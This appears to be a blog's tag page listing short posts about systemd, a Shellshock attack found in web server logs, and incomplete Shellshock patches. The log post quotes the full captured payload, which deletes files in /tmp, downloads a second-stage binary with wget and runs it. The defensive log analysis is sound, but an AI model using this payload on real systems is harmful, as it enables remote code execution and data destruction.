Below you will find pages that utilize the taxonomy term “exploits”
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/;echo%20rm%20-rf%20/tmp/;chmod%20777%20/tmp/;/tmp/ This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.